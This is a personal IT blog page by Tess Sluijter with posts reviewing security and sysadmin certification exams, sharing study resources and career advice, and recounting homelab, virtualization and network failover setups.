Kilala.nl - Personal website of Tess Sluijter

Unimportant background
Login
  RSS feed

About me

Blog archives

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

2004

2003

> Weblog

> Sysadmin articles

> Maths teaching

CompTIA goes live with two new beta exams: SecurityX and Pentest+

2024-05-18 00:17:00

I guess most people know by now that I'm a sucker for beta-testing exams. CompTIA went live with not one, but two new betas!

They have published the exam objectives here.

I just spent five hours doing a comparison of the PT0-002 and PT1-003 objectives. The changes to Pentest+ are pretty extensive. Many small details are swapped out. Two big areas are swapped: there is much less focus on mobile (app) pentesting and there is much more focus on the SDLC and containers. 

Here's my comparison. It shows which objectives were carried over from 002 to 003, but also which were added (green) or removed (red).


kilala.nl tags: ,

View or add comments (curr. 0)

MCCT (Modern Classroom Certified Trainer) done

2024-05-13 08:58:00

This weekend I had a few spare hours to laze around in my hammock. What better way to spend them, than to do some quick brushing up on my training skillset?

Logical Operations, have a training and certification they call MCCT: Modern Classroom Certified Trainer. It is currently discounted to $95, including the exam and cert. 

MCCT is very clearly targeted at trainers who need to migrate from classroom to digital teaching. The training and certification do not go into didactics and curriculum creation, it is purely about achieving success in digital / remote / asynchronous training.

MCCT is by no means a replacement for CompTIA's now-retired CTT+. 

Training materials consist of 2.5h of video, a PDF book and slide decks. The exam are 48 multiplechoice questions, 36/48 needed to pass. The exam is untimed, unproctored and open book. 

My opinions on the matter:

Jon's training impressed upon me once again the importance of community-building, especially in an async class. Yet again that makes me amazed that Practical DevSecOps appear to actively discourage community-building in their trainings. 


kilala.nl tags: ,

View or add comments (curr. 0)

Rescuing my homelab

2024-05-10 17:12:00

It's been almost a year since I last fired up my homelab. I haven't had a need for the 20+ VMs since I did my Ansible and CDP exams as just about all the other exams I prepared on a smaller, local env. 

A few weeks back I decided to fire up my R710 again, to see if everything still works. It's antiquated and it runs a version of VMWare ESXi 6.5.x. Since its boot drive is a USB flash drive, I was a bit worried.

Lo and behold, I am greeted by a pink/purple screen that says:

failed to mount boot tardisk

Whelp... I have some inclination what that means and I don't like it. Unfortunately the Internet also wasn't of much help, as that exact error appeared once on a German forum. 

After some messing about, I'm happy to learn that my USB boot drive still had a recovery option! Pressing <shift><r> when told to, pops me into recovery mode. It tells me I can restore a previous install (which curiously had the exact same OS version), which I did.

By the sounds of it, all my VMs are booting again. :)

Now to make a backup of that flash drive!


kilala.nl tags: , ,

View or add comments (curr. 0)

Trying out two certification exams: CASA and Cloud+

2024-02-02 07:28:00

In 2020 I took the CV1-003 CompTIA Cloud+ beta. Back then I wasn't really impressed with the quality of the exam. Well, it's time for the next version!

A few weeks ago I took CV1-004 for $50, to see if it's better than last time. Yes, but no. 

The questions on the new beta were more diverse than last time. And I still like the exam objectives / curriculum. But in general, I wasn't a fan of the exam questions. I know CompTIA often has questions where you're not supposed to think from real-life experience, but this time around it's really pretty bad. Know that meme of grandma yelling "that's not how any of this works!". Well that was me. 

Especially the PBQs felt like CompTIA were struggling to come up with something that works. And if I have to see one more white-clouds-on-blue-sky stock photo I'll scream. 

Jill West, an instructor on CIN, wrote it pretty eloquently:

"That was a bizarre exam. Only one of the PBQs really seemed appropriate to the test [...] Some other questions seemed like someone was looking at the objectives to write their questions but didn't really understand the concepts; they just used several items from the objectives as "wrong" answers when those options really weren't congruent with each other [...]"

So yeah. If there's a student interested in learning about cloud computing, I would suggest the read the materials, but I wouldn't suggest they'd take the exam.

===

After passing PDSO's CASP API security exam, I thought I'd look at some of their competition. I'm still going through APISec University's courses (which seem good), but I also gave their CASA exam a quick shot. 

In short: I will definitely recommend their training materials to students, but not the CASA. CASA is:

  1. 100 questions
  2. Open book
  3. Unproctored
  4. Untimed
  5. ... and it rings in at $125

Points 2, 3 and 4 unfortunately mean that, from an employer's point of view, the certification isn't worth much because there's no guarantee that whomever has it didn't cheat in some way. Basically my biggest critique of PDSO's exams as well (which has points 2 and 3, but not 4).

The questions on the test were well written, so that's something. They are a decent way for someone who's taken the APISecU classes to test themselves. And the potential employers will simply need to do better BS-testing in interviews. :) 


kilala.nl tags: ,

View or add comments (curr. 0)

Book recommendation: Microservice APIs, by José Haro Peralta

2024-01-21 15:21:00

In the months leading up to my PDSO CASP studies I read José Haro Peralto's "Microservice APIs". On and off, between classes and between other things I was learning. It's been a long read, but I can heartily recommend it. 

I can honestly say that José's excellent book is what taught me the most I now know about how APIs work! And it most certainly made a lot of things clear, which I also learned about in CASP. 

Before I read "Microservice APIs" I had a foundational grasp of how REST and SOAP APIs look from the outside, as consumer. I'd used OpenAPI specs, I'd read through WSDL files and I'd made API calls through HTTP. But I never really understood how it all worked on the server side. 

José's book makes all of that server side magic crystal clear!

The book explains foundational and deep technical aspects of building multiple interacting APIs, which together form the backend of an online coffee product shop. And José shows all of it! All the Python code to load the frameworks, to write the queries and to build the endpoints. All of the code needed for GraphQL and two different REST implementations. And even a bit of authentication and authorization! Heck, appendix C of the book turns out to have exactly what I was looking for when I wanted to learn about integrating OIDC and OAuth into the authorization checks of an API!

If you hadn't guessed yet: "A+ would recommend".


kilala.nl tags: , ,

View or add comments (curr. 0)

PDSO CASP exam done! Let's review!

2024-01-21 11:22:00

Almost a month ago I started my studies for PDSO CASP, or Practical DevSecOps - Certified API Security Professional. That's a whole lot of words! 

I've taken two PDSO classes and exams before: CDP in 2021 and CTMP in 2023.

Yesterday I took the exam and boy-howdee! did I get off on the wrong foot! I thought I'd booked the exam to start at 0800, but when I was brushing my teeth at 0645 the exam instruction email arrived! My own fault and luckily I was at my desk in fifteen minutes... I didn't miss any time, I was just a lot less relaxed than I'd hoped to be. 

It was fun to do another hands-on hacking exam! Six hours of happy hacking! Having said that, I have one thing to nag about. 

The exam did not test anything new. PDSO themselves in their training materials always advise: (paraphrased) "if you do all the labs and take careful notes, you will do well on the exam". They said it with CASP, they said it with CTMP and with CDP. 

With CDP there was additional depth to the exam insofar that you needed to apply concepts that you had learned to new technology. For CASP that did not ring true. And I understand why PDSO took this approach. CDP was about implementing CI/CD pipelines, while CASP is about attacking (pentesting?) APIs. And one does not "simply pentest" five different APIs in six hours time. 

In my feedback to PDSO (and I gave plenty of it) I suggested that they could make a proper competitor to APISecU's ASCP exam by creating a second, longer and more in-depth exam. If PDSO made CASE (certified API security expert) which lasts twelve hours and has you do proper recon and attacking, I'd be all over that!

In essence the difficulty level of PDSO CASP is not defined by the technical challenges, but by time management and by foundational understanding. If you didn't do the training and labs, or if you don't have prior API pentesting experience you will fail. And if you cannot do those five challenges in six hours, while collecting evidence (screenshots, logging, code), you will fail. 

Speaking of which: the reason why my reporting went so well, is because I ahdere to the most important lesson I learned from BHIS and John Strand: "Document as you go."

You will need to be picky about how you attack the challenges and you will definitely need to timebox. In my case the challenges were worth 20, 20, 15, 25 and 20 points and I need 80 out of 100 points to pass. Having said that...

The exam assignments are clear and complete, as is the list of requirements for your reporting. PDSO make it very clear how you will be scored and they give you every opportunity not to fail. 

The team at PDSO are very responsive. Support for the training and exam are arranged via MatterMost and you will always find someone from the team online. If there's a technical issue, they will report on it very quickly and they will make good time in resolving the issues. 

Having said that, I am surprised at the lack of community building on MatterMost. They have 2500+ students on there and the community chat is very quiet. And every time that someone does ask a question about course contents, they are immediately approached by someone from PDSO to tackle the question in DMs. There is no community building or involvement. 

Then there's one final, big factor which I feel detracts from the professional value of the PDSO certifications: validation. 

At no point before, during or after my exam was my identity verified. There is no proctoring, no session recording, nothing. My exam could have been done by anyone. I could have used any method of cheating and they would not know. My report could have been written by anyone. 

This will automatically devalue the certification for prospective employers. Instead of relying on the certification body, the employer will need to apply their own bullshit detector to verify if the applicant actually has any API hacking experience. 

Mind you, this is not unique to PDSO. APISec University have the same problem with their CASA exam which is unproctored, unvalidated and open book. I haven't taken APISec's ASCP yet, so I don't know if that's proctored. 

...

About the CASP training itself? I liked it well enough and it did teach me quite a few new things. It's just that at a few points I really wish they'd gone more technically in-depth than they did. Don't get me wrong, they already go pretty deep on a lot of topics, but I wanted more. Case in point: I did two 6-8 hour deep dives on OAuth and on OAuth+OPA to really understand how a technical implementation in code would work. 

It was time and money well spent!


kilala.nl tags: ,

View or add comments (curr. 0)

Learning more about OIDC, OAuth and OPA

2024-01-15 20:12:00

Almost a month ago, I did a deepdive on how OAuth really works, as part of my preparations for the PDSO CASP exam. 

Well, it's time for another one! Because I really wanted to know how you would use OAuth in conjunction with OPA (open policy agent) to drive the access controls on your API and business logic. 

I spent another six hours, watching videos and reading through sample code to put two-and-two together. Here's linkks to resources that really helped me.


kilala.nl tags: ,

View or add comments (curr. 0)

Why can't vendors just make practice exams, just like the real thing?

2023-12-31 13:29:00

On Discord someone asked why it's so hard for vendors to "just" make practice exams that are just like the real thing? To them, it seemed like an obvious market gap! And to be honest, who wouldn't want a proper test run while prepping for Security+, LPIC1 or even CISSP?!

Now, I'm no expert, but here's what I told'm...

Most importantly it's because you absolutely have to blackbox the practice exam creation. There can never be any doubt whatsoever that you as vendor stole copyrighted materials or that you lifted questions and concepts from the official materials.

You have to have proof of your process and show that none of your personnel have ever taken the real exam. This means you have to hire a group of SMEs (subject matter experts) and have them create a testbank of 2000+ questions which cover all of the exam objectives for that one exam. But they're not allowed to look at official materials ever; possibly not even the objectives themselves.

And then you have to do that ten-or-so times, to cover all the exams. So basically at that point, you are making a brand new exam and you're competing with Linux Foundation, LPI, ISC2, CompTIA, etc.

It costs a huge amount of money.

Since we're in an IT forum I can safely point you towards this, which is strikingly comparable... Look into how Compaq reverse engineered the IBM PC BIOS, so they could make IBM PC compatible devices. Very similar.

For the exam questions, taking the Compaq analogy, it would mean that you need to have a team that creates a very precise set of requirements and design decisions. Theoretically they could look at what CompTIA and other vendors do.

Then you would need that second team of actual SMEs to write those hundreds or thousands of questions, based on the specifications written by the first team.

And then possibly, you could get exams which are very close to what CompTIA does. 


kilala.nl tags: ,

View or add comments (curr. 0)

Learning about OAuth

2023-12-27 20:33:00

OAuth is a topic that has popped up a few times in my certification studies (Security+, CISSP, CSC210), but in none of those cases the curriculum went in-depth on how it works. As in really, how do you implement it, what does it look like in action? 

I'm currently going through PDSO's API security training, preparing for the exam. OAuth gets about twenty minutes of video in there and they do a relatively good job of explaining. But yet again, there's still a lot of details missing. 

Today I spent five or six hours reading through the resources below, making a huge stack of flash cards so I can refresh what I learned at a later point in time. 

For those who might struggle a bit with OAuth and how it would be implemented in code, here's an absolutely great example of a Javascript SPA (single-page app).

I then also read:

I also had no clue whatsoever about how those links worked, where you do something in a browser and it pops up an app on your smartphone, tablet or computer. I learned that's called app deep linking and it's something that's both really cool and that's had its share of vulnerabilities as well. This was a great read which taught me how the URI schema for app deep links work and how they can be attacked. 

EDIT:

Oh my gosh, the folks at Curity made a great 8-part mini training that introduces OIDC and OAuth. Parts 7 and 8 perfectly explain 90% of what I wanted to know when I started my research.


kilala.nl tags: ,

View or add comments (curr. 0)

CompTIA ITF+ exam

2023-12-03 11:01:00

After my frustrating start with the exam check-in (started at 08:15, finished at 09:00), I did get to do the CompTIA ITF+ (IT Fundamentals) exam. 

Tess? Why do this most entry-level of junior exams? Two reasons:

  1. I'm test-running it for my students at ITVitae, to see if the curriculum and exam are decent.
  2. I've built a webshop selling heavily discounted CompTIA vouchers and wanted to test the payment process, by buying the cheapest voucher.

So what did I think? 

I like the curriculum / objectives. They cover a wide range of topics, which I feel most people in IT should really be familiar with.

The exam itself was decent, though I'm not a huge fan of how a lot of the questions were worded. In some cases the grammar felt a lot more clunky than I'm used to from Linux+, Pentest+, etc. 

I scored much lower than I'd expected! The range is 100 - 900 points, with a pass at 650. I scored 730, which suggests that I misread questions or that CompTIA wanted me to think about a question differently. Plus, I do believe that one or two questions, I got tripped up by the very weird wording. 

Do I think ITF+ is worth it for the most junior students I will be teaching? Yes, the curriculum is worth it. But I do feel that the exam might be a bit frustrating for them. 


kilala.nl tags: ,

View or add comments (curr. 0)

My first real frustrating encounter with OnVue remote testing

2023-12-03 10:46:00

Two screenshots of a photo app

Today I took CompTIA's ITF+ exam at my office, using PearsonVue's OnVue testing software. This has gone wel for me 10+ times, but today it didn't. 

What changed? I used a desktop Mac instead of my usual laptop. What else went wrong? The check-in process. 

Let's start with that last one: the check-in process.

This has gone perfectly well for me 10+ times. You visit https://mobile.onvue.com on your smartphone, you enter the exam ID and you go through the wizard to take photographs of yourself, your ID and the room. 

The big problem is that the "shutter" button to take the photograph went missing. It was impossible to take the photo.

In the screenshot above, you will see that:

This made it impossible to photograph my ID and to proceed with the check-in. 

I contacted the PearsonVue support team via chat and they did not understand my problem. They asked for error messages, or told me to use my phone (I was), or told me to try my laptop (I didn't have one). 

Why use a laptop? There is a secondary method of taking the photos inside the OnVue exam app itself. It uses your computer's camera for the photographs. This would have worked to some degree, were it not that I was using a desktop PC with a wired camera. 

Plus it turns out that the Logitech 720p camera I have is not good enough to take these pictures as it has fixed focus. 

After a lot of back and forth with support, I accidentally found out (by flicking the screen on my phone) that the camera shutter button is in fact on the ID page, but it's out of view. You have to scroll the layer with the overlay. That was 200% un-intuitive. 

Later on I was also informed that my Wacom pen-tablet is not a permitted peripheral; that was on me, I should have know. Quickly switched to an old mouse.

Lessons learned from todays OnVue exam:

The rest of the exam, after checkin? Zero technical problems. I'll write about ITF+ separately. 


kilala.nl tags: ,

View or add comments (curr. 0)

I didn't think starting a webshop would be this easy

2023-12-01 20:11:00

A few weeks ago my company become official Delivery Partner of CompTIA's, which means that I can now officially also teach classes on their behalf. I've already taught Linux+ for a few years, at ITVitae, but that's using my own materials and the Bresnahan/Blum book.

One other benefit to this partner status, is that we can purchase exam vouchers at a 20% discount. In this, I see the opportunity to help struggling newbies who want to break into IT, even if it's just a little. 

In my life, I've was helped by a great number of people and thus I firmly believe in "lifting up" and in "paying it forward". If I can take a small financial hit, in order to help people take their exams at a cheaper rate, I'll gladly do it. 

Having no prior experience in running a webshop (aside from a few internship projects 25 years ago!), I looked for the nicest-yet-low-barrier solution. 

The Unixerius site is built using Rapidweaver, a MacOS WYSIWYG editor which has made it very easy to quickly whip up a decent looking site. I spent about an hour research options of affordable webshops, only to be happily surprised by Ecwid.

Ecwid are a webshop SaaS provider who offer a full frontend + backend system. They integrate with the payment providers I would need for the European market (Paypal, SEPA and Stripe, which offers iDeal). Their management system is excellent. And their frontend nativel integrates with Rapidweaver. 

It took me roughly three hours to set everything up, from A to Z. And it all works very well, I was my own first customer by test-purchasing an ITF+ voucher.

I will not be doing any big marketing for this shop. It's intended to be a small way to help out struggling students. I'm not looking to piss off the big CompTIA partners by severly undercutting them on large amounts of sales. 

Heck, I'm restricting voucher purchases to one-per-person, to prevent pissing off CompTIA themselves. :)


kilala.nl tags: ,

View or add comments (curr. 0)

Study resources for ISC2's CC exam

2023-11-23 11:39:00

In the summer of 2022, ISC2 introduced what was then called their ELCC exam. These days it's just "CC": Certified in CyberSecurity. At the time I concluded that ISC2's CC is a decent curriculum and exam, for people who need foundational understanding of enterprise-level cybersecurity. 

In October of 2022 and 2023 I ran in-house "study challenges" for my customer, with 10-20 people attempting to pass the CC exam within the one CyberSecurity Awareness Month (CSAM). When we started, all there was to study were the free video trainings from ISC2. 

Since then, new and much better resources have become available!

Remember to never pay full price on Udemy! They run huge discounts very regularly.


kilala.nl tags: ,

View or add comments (curr. 0)

I presented at WICCON about AppSec / DevSecOps

2023-11-01 11:48:00

me on stage

This was so much fun!

WICCON is an IT conference by women, for everybody, featuring a full cast of just women presenting about their work! Next to volunteering in the Black Cat Society, I also submitted a CFP. My talk was accepted. :)

You can view all presentations on WICCON's Youtube channel.


kilala.nl tags: ,

View or add comments (curr. 0)

Virtualization, Linux labs on Apple Silicon

2023-07-17 20:18:00

I've held off on spending money on a new Mac for a long, long time. I have two Macbook Airs from 2017, which are still holding up admirably for my studies and work. Honestly, their 8GB of RAM and aged i5 are still plenty good for most of my work. 

Sure, I did get an Asus laptop with a beefy Ryzen in there, for teaching purposes. But even that's an ultra-portable and nothing hugely expensive. 

I've had to bite the bullet though: the chances of me getting students with Apple Silicon laptops are growing. My current group at ITVitae has my first one and it's a matter of time before a commercial customer pops in with an M1 or M2. 

So, I got myself a second hand 2020 M1 Mac Mini from Mac Voor Minder. Good store, I'd highly recommend. 

I had hoped that, in the three years we've had the Apple Silicon systems out, virtualization would be a solved problem. Well... it's not really, if you want one of the big names. 

VirtualBox, forget about that. It's highly in beta and is useless. VMWare Fusion supposedly works, but I didn't manage to get it to do anything for me. And I'm not paying for Parallels, because most likely my students won't either! I need cheap/free solutions.

Turns out there's two.

  1. UTM, which uses Qemu under the hood. It's brilliant. Looks spiffy, has good options and does both virtualization (aarch64) and emulation (many other architectures). It does not have an API and it does not work with Vagrant. But I love it. 
  2. You can also install Qemu via Homebrew and then use the Vagrant-Qemu plugin to build VMs. It works well, although it doesn't support all great Vagrant options yet. One downside is that the amount of aarch64 images for Qemu on VagrantUp is small. 

I'm now rewriting the lab files for my classes, to make them work on M1/M2 ARM systems. I'm starting with the lab VM for my DevSecOps class and then moving onward to two small projects that I use in class. Updating my Linux+ class will take more work.

Maybe I should start making my own Vagrant box images. :)


kilala.nl tags: , ,

View or add comments (curr. 1)

Preparing for (and passing) Red Hat's EX188, specialist in containers

2023-06-24 12:55:00

It's been well over a decade since I started doing Red Hat certifications, back in th RHEL6 era. Since then I've gone after many exams and certs, taking a few every year although not limited to Red Hat stuff. For Red Hat I'm basically making sure to take a new every 2.5-3 years, so I can offically retain my "RHCE" status from 2014. 

After my frustrating encounter with EX413 (security, 2017) and the fun EX407 (Ansible, 2020), it was time again! Since my agenda and wishlist are so incredibly stuffed, I will admit that I took "the easy way out" in renewing my RHCE by taking EX188.

EX188 is Red Hat's first exam in the line of certifying on the subject of container administration and development. It's about using Podman/Docker, to build and run containers in a local environment. No high availability, no Kubernetes or OpenShift... Basically a big step back from my CKA exam from last year.

But, pragmatism has its place. This year I've got a lot of other plans for my own studies and my work as teacher and this was a solid and educational way to get to a goal quickly.

Preparations

To make sure I'm well enough prepared:

Testing from home

I still very much like that Red Hat will let you take their practical exams from home. Unfortunately they use a much harder-to-use setup than people like Linux Foundation. Preparing to take CKA from home was dead simple. Preparing for Red Hat Kiosk exams is a chore.

 The e-book says my Macbook Air from 2017 should work, but it doesn't. So I used Dick's Lenovo gaming laptop again. It only works with the 2020-08 ISO, because of it's built-in M970 GPU. I also had to buy a cheap Logitech webcam, because my Razer cam didn't work. 

Important: make really, really sure that you test your computer fully way before the scheduled exam date. You must do this. 

The exam itself

I enjoyed it! It's 2.5 hours, for a handful of tasks. Red Hat advise you to first read through all assignments before starting, because one task may rely on another. Reading all tasks will take about fifteen minutes. I advise that you really do read all tasks before starting. 

The task descriptions for EX188 are good. They are thorough and detailed, they give you all the information you need for success. I have two minor squibles with the task texts.

  1. One choice of words that is repeated in each task is ambiguous (but you don't have to worry about it).
  2. One task had two lines in it that 100% contradict each other. They offer an impossible conflict. After discussing the conflict with the proctor, I followed their advice to use a logical approach which rules out the impossibility itself. 

I needed the full 2.5 hours for the exam. I had 85% of the work done after ~1.5, but then needed the remaining 45 minutes for debugging the final 15%.

Again, I really enjoyed the exam. It's well put together, not frustrating at all.


kilala.nl tags: ,

View or add comments (curr. 0)

Setting up Internet failover on UDM Pro, with Teltonika RUT241

2023-04-21 18:37:00

It's no secret that I use Ubiquiti equipment for my networking. My office runs on a UDM Pro, which has been great for me. 

The UDM Pro performs well and stable, it has a great feature set and it's easy to manage (for someone who wants to spend little time managing their network). Heck, even site-to-site VPN for my security cameras was simple!

My main WAN connection comes from MAC3Park, my housing company. They recently had an outage on my Internet connection, which lasted a few days. That messes with my backups and a few of my business processes, so I want to have at least some form of alternative in place. 

Luckily, the UDM Pro also makes it dead simple to configure automatic failover or even load balancing across two WAN connections! It really is amazingly simple! Or it should be, as we'll see in a bit. 

As a second Internet connection, I looked into getting 4G/5G from my mobile provider. Ubiquiti have their own LTE/4G/5G solution, which looks awesome but is a bit expensive. For half the price, I got a Teltonika RUT241 aimed at IoT solutions.

Sure, the LAN port on the RUT241 is slower (10/100Mbit), but seeing how the 4G connection averages around 20MBit that'll be fine. That's also where the "should be simple" I mentioned earlier comes in. 

The RUT241 worked great with my laptop, but hooking it up to the SFP RJ45-module on the UDM Pro it just wouldn't go. No amount of changing settings would make it work. Very odd! There was no DHCP lease and even a statically assigned IP wouldn't let me connect to the Teltonika.

Turns out that, upon closer inspection, my vendor sent me the wrong SFP module :) I'd ordered the 1G model (which does 10/100/1000), but they sent me the 2.5G (which does 1000/2500/10000). The latter will not work with the Teltonika. 

Time to get that SFP replaced by my vendor and we'll be good to go!

EDIT:

Or even better! I could just switch my cabled connection from MAC3Park (which is 1G) to port 10 and switch the Teltonika to port 9 (which natively does 100/1000). So basically, switch the definitions of WAN1 and WAN2 around!

EDIT2:

That worked. 

I made port 9 WAN2 and port 10 WAN1. I switched the cables around and now port 9 happily runs at 100Mbit, connected to the Teltonika.

Even nicer: in bridge mode, port 9 gets the 4G IP address so it's perfectly accessible as intended. But in that same bridge mode, the RUT241 remains accessible on its static, private IP as well so you can still access the admin web interface. 

So if, for example, my internal LANs are 10.0.10.0/24 and the Teltonik's private IP is 10.0.200.1, I've setup a traffic management route which says that 10.0.200.0/24 is accessible via WAN2. That way I can manage the Teltonika web interface, from inside my office LAN, even when it's in bridge mode. Excellent!

EDIT3:

I tested the setup! 

Setting the UDM Pro to failover between the connections works very well. Within 60 seconds, Internet-connectivity was restored. It does seem that the dynamic DNS setup does not quickly switch over, so a site-to-site VPN will fail for a lot longer.

Setting the UDM Pro to load balancing didn't work so well. The connection remained down after I pulled WAN1.


kilala.nl tags: , ,

View or add comments (curr. 0)

PECB ISO/IEC 27001 Lead Implementer: training, examination and certification

2023-04-19 11:29:00

This month, I've put some time into formalizing my experience with the ISO 27001 standard for "Information Security Management Systems". That is, the business processes and security controls which an organization needs to have in place to be accredited as "ISO27001 certified"... which translates into: this organization has put the right things into place to identify, address and manage risk and to provide personnel and management with policies, standards and guidelines on how to securely operate their IT environment. 

It's a cliché that people in IT have a distaste for "auditing" and "compliance". And sure, I've never had much fun with it either! But I felt I was doing myself a disservice by not formalizing what I've learned over the past decades. Or to put it the other way around: making sure I properly learn the fundamentals, means that I can assist my customers better in properly structuring their IT security. 

So off I went, to my favored vendor of InfoSec trainings: TSTC in Veenendaal. :) 

They provide the PECB version of the ISO27001 LI training and examination. The PECB materials aren't awesome, but they get the job done. And yes, if you're a hands-on techie, then the material can be rather dreary. But overall I had a fun four days at TSTC, with a great class and a solid trainer. 

The exam experience was a bit different from what I'm used to with other vendors.

TLDR, in short:


kilala.nl tags: , ,

View or add comments (curr. 0)

CFR 410: quick follow-up

2023-03-29 21:41:00

As a quick follow-up to this week's post about CSC 210 and CFR 410: I've now also gone through the majority of the course book for CFR 410. 

Like CSC I can say I'm of the opinion that the course book for CFR is solid. It's good. I might not like the CFR exam, but the book is good!


kilala.nl tags: ,

View or add comments (curr. 0)

CertNexus CSC 210 and CFR 410

2023-03-24 10:27:00

About a month ago I re-sat CompTIA's Linux+ exam, to make sure I am still preparing my students properly for their own exams. I still like the Linux+ exam (which I first beta-tested in 2021) and I'm happy to say that my course's curriculum properly covers all "my kids" need to know.

This week I sat not one, but two exams. That makes four this year, so far. :D

Why the sudden rush, with two exams in a week? I'm applying as CertNexus Authorized Instructor, through an acceleration programme that CN are running. They invited professional trainer to prepare and take their exams for free, so CN can expand their pool of international trainers. 

I feel that's absolutely marvelous. What a great opportunity! I heartily applaud CertNexus for this step.

The first exam which I took was CSC-210: Cyber Secure Coder. The curriculum had a nice overlap with the secure coding / app hacking classes that our team taught at ${Customer}, which means it's a class I would feel comfortable teaching. It's not programming per sé, it's about having a properly secure design and way-of-work in building your software. The curriculum is language agnostic, though the example projects are mostly in Python and NodeJS. 

I went through the official book for CSC and I like the quality. I actually enjoyed it a lot more than CompTIA's style. I haven't gone through the slide decks yet, so I can't say anything about those yet. The exam, I really liked. The questions often tested for insight and when it asked to define certain concepts, it wasn't just dry regurgitation. 

I can definitely recommend CertNexus CSC to anyone who needs an entry-level training and/or certification for secure development. 

Now, CFR-410 (CyberSec First Responder) is a different beast. I took the beta back in 2021 and at the time I was not overly impressed. The exam has stayed the same: it still asks about outdated concepts and it still has dry fact-regurgitation questions. 

I haven't gone through the book and slides yet, I'll do that this weekend so I can update this post. 

have contact CertNexus to offer them feedback and help, so we can improve CFR. Simply complaining about it won't help anyone, I'd rather help them improve their product.

EDIT: CertNexus have indicated they will welcome any feedback I can provide them for CFR, so that's ace. I will work with them in the coming weeks. 


kilala.nl tags: , ,

View or add comments (curr. 0)

The value (or not) of Linux+

2023-03-18 19:30:00

On Discord, people frequently ask whether "is Linux+ worth it?". Here's my take.

The value depends on your market and on what you get out of it. In the US and UK, CompTIA is a well-known vendor but in other parts of the world they aren't. But left or right, Linux+ is not very well known.

I teach at a local school to prep young adults for the Linux+ exam. The school chose Linux+ because they can get heavily discounted vouchers for the exams, versus LPI, LF and others. For the school it was a matter of money: they really don't have much money and every dollar helps. 

Personally, I feel that the Linux+ curriculum is pretty solid as far as Linux sysadmin certs go. The exam itself is also decent and the vendor is mature. 

So in this case the value you'll get is from learning Linux system administration pretty in-depth. You'll also get a slip of paper which some might recognize and others will go "*cool, you passed a cert exam, good job*" (in a positivie sense). 

Linux+ is not worthless, it's just worth less (when compared to LFCS, LPIC1 and RHCSA).


kilala.nl tags: , ,

View or add comments (curr. 0)

DevSecOps: who's responsible?

2023-03-04 08:20:00

Someone on Discord asked: "Question: Does DevSecOps type of work fall under ISSO's roles and responsibilities?"

That got me thinking. 

IMO: DevSecOps, like many things in InfoSec, is something everybody needs to get in on! 

Architects need to define reference designs and standards. The ISO needs to define requirements based on regulations and laws and industry standards. An AppSec team needs to provide the tooling. Another team needs to provide CI/CD pipeline integration for these tools. And yes, the devops squads themselves need to actually do stuff with all of the aforementioned things. Someone needs to provides trainings, someone needs to be doing vulnerability management. Etc.

One book on the subject which I heartily recommend, is the Application Security Program Handbook, by Derek Fisher.

I bought that book right after leaving my previous AppSec role, where we spent two years building an AppSec team that did a lot of things from that list. I was amazed by the book, because cover to cover it's everything we self-taught over those two years.


kilala.nl tags: ,

View or add comments (curr. 0)

You've got your Security+. Now what?

2023-02-26 12:55:17

On /r/comptia and Discord, there's a lot of people hopeful to break into cybersecurity. The get their Security+ (because CompTIA's marketing promises a lot of jobs), but... then what?

Here's something I told someone on Discord the other day.

CompTIA will have a big list of options in their marketing fluff, but as I said I personally don't believe Sec+ preps you for any particular roles.

That doesn't mean it's not valuable! Quite the opposite! Having passed Sec+ means you bring fundamental InfoSec knowledge to any role you'll work in, be that user support, systems administration, network operations, DevOps, IAM, risk management, or whatever.

Career wise, it makes sense to define short and longterm goals for yourself. Investigate what different jobs in your local marketplace mean, what the work involved actually is and check their requirements.

${Deity}, I'm saying the things I hated hearing twenty years ago, but here we are.

Next to those goals, also investigate the options available to you in your local marketplace. Also take stock of your current set of experience and skills. This information will help you figure out what kind of tools are at your disposal to meet your goals.

For example, say that your long term goal is to have a hardcore technical role in cyber security. Like pen-tester maybe, DevSecOps engineer or cloud security engineer.

From that you would start figuring out which of those roles sound best to you and figure out what you need to learn to get there. This will help you define short term goals... mile stones, if you will.

For example, if you already have some prior IT experience and you've dabbled with programming and Linux, then you could aim for junior devops or sysadmin roles for the short term. If you've already done a lot of TryHackMe, HackTheBox then a junior pentesting role, or junior devsecops.

Now, if you have zero IT experience, then you're going to have to take a different route. One option is to start way lower in the IT ladder, like IT support. Another option is to go for a soft-skills based role! Like user awareness training, or risk management.

Here's a very long Reddit thread about why it's hard to break into InfoSec right from the start.

Which reminds me of a solid tip: check your local market for MSSPs: managed security service providers. They are often in a position to train juniors with little IT experience into the job. They need warm bodies to take care of the low-level work influx and can help you build experience and knowledge on the job.


kilala.nl tags: ,

View or add comments (curr. 0)

Preparing for Server+: labs?

2023-02-26 11:56:00

On the CompTIA sub-reddit, people often ask for labs to work through while prepping for an exam. For Linux+, I've made all the labs for my class freely available on Github. 

Server+ is a less common CompTIA exam, which focuses on sysadmin / data center admin roles. There's quite some overlap between A+, Linux+ and Security+; I kinda liked it!

Here's a few suggestions which I gave for practice for SK0-005 Server+

Unfortunately a lot of the aspects of Server+ relate to actually working in a data center, so it'll be hard to have labs for those sections.

Most of objective 1 you will need to have actual hardware for. If you're in the US, you can check LabGopher to find gear for your homelab. Otherwise, check your local nerdery forums or just eBay. A Dell R410 or R420 with Perc and RAID controller will set you back 100-400 dollars depending on specs and if hardware is included.

If you're already in IT, you can also ask your server admin team if they'd be willing to show you the ropes for objective 1.

Many of the topics in objective 2 can be practiced if you have a few VMs that run Windows, Windows Server and Linux to try out the various related tools. You can run these VMs on just about any recent laptop with 8GB or more of RAM and an i5/i7/i9 or similar Zen2 processor.

Virtual networking on objective 2 can be practiced with VMWare ESXi and pfSense.

The good part is that the software mentioned so far can be gotten for free legally. Windows is available for free use on 180-day licenses (which can be renewed multiple times). VMWare ESXi can be gotten on a free license, also for studying/lab purposes.

Licensing and asset management are mostly theoretical on Server+

Objective 3 is partially theoretical/conceptual, but there's a few practical aspects as well. Server hardening is something you can practice with the aforementioned VMs by reading and applying STIGs or CIS Benchmarks. If you're familiar with Ansible, you can even dive into the relevant playbooks. IAM can be practiced with Active Directory and/or Azure AD.

Objective 4 again is a nice mix of theory and practice. LogHub is a nice resource to read through all types of different log files. A lot of the other troubleshooting objectives can be exercised with the lab VMs and hardware I mentioned simply by trying to get it all to work :D That can sometimes already be a struggle, so you're troubleshooting!

Multiple objectives relate to services which you can run, configure and test on Linux VMs. NTP and SSH are two common ones, which I also include in my Linux+ labs. Ditto for the networking config + troubleshooting.


kilala.nl tags: ,

View or add comments (curr. 0)

